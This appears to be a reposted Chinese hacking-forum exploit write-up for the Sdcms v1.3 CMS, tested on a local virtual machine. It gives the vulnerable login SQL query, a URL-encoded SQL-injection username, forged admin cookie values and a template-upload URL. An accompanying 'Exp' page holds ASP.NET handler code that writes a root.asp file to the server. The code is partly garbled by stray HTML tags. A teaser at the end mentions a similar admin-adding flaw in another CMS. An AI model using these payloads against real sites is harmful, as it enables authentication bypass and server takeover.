【漏洞】时代网站信息管理系统 Sdcms v1.3

转自：http://t00ls.net/thread-13767-1-1.html，原作者：st4nd。

首先在以下地址使用 livehttpheader 抓包得到 COOKIE 值：

    http://192.168.248.129/admin/index.asp?Action=out

COOKIE：

   1Rq4Qz6We6Dbsdcms%5Finfolever=; 1Rq4Qz6We6Dbsdcms%5Falllever=; 1Rq4Qz6We6Dbsdcms%5Fadmin=; 1Rq4Qz6We6Dbsdcms%5Fpwd=; 1Rq4Qz6We6Dbsdcms%5Fname=; 1Rq4Qz6We6Dbsdcms%5Fid=; ASPSESSIONIDCQDBQTAD=BHPFKHJBDBOIPLOMALGOMFAA

查询语句：

   Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='"&sdcms_adminname&"' And sdcms_pwd='"&sdcms_adminpwd&"'"

   Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='stcms' or '1'='1' or '1'='1' And sdcms_pwd='LAONA'"

用户名可以前台得到：

    stcms%27%20or%20%271%27%3D%271%27%20or%20%271%27%3D%271

使用 COOKIE EDIT 修改 COOKIE：

    1Rq4Qz6We6Dbsdcms%5Fpwd=123; 1Rq4Qz6We6Dbsdcms%5Fname=stcms' or '1'='1' or '1'='1;1Rq4Qz6We6Dbsdcms%5Fadmin=1;1Rq4Qz6We6Dbsdcms%5Fid=1;

然后进入：

    http://192.168.248.129/admin/sdcms_template.asp?action=add&Path=2009

或者直接使用底下的 fuck.html。

其实就是一个COOKIE，或者进后台吧，虚拟机2003测试的。。。不行当我没发。。。

fuck.html 源码【Exp】：                                                                                                         目　录：      ../Skins/2009/ 文件名：      　格式：sdcms_index.htm 内容： GIF8A </p> <p>using System; <br /> using System.Web; <br /> using System.IO; <br /> public class Handler : IHttpHandler {</p> <p>public void ProcessRequest (HttpContext context) { <br />        context.Response.ContentType = "text/plain"; <br />       <br />        StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp")); <br />        file1.Write(""); <br />        file1.Flush(); <br />        file1.Close(); <br />       <br /> }</p> <p>public bool IsReusable { <br />        get { <br />          return false; <br />        } <br /> }</p> <p>}</p> <p>

文章来源于lcx.cc:【漏洞】时代网站信息管理系统 Sdcms v1.3

相关推荐: Luocms 2.0 文章管理系统添加管理员漏洞

    蛋疼的作者……，代码稀少又简单，这也拿去卖钱……，-0-！     这个作者的思想是用户能直接看见的文件就“Session”验证，没有显示东西的就不用理了。。。     还是那句，看代码： “adminmanageradmin_ok.php”：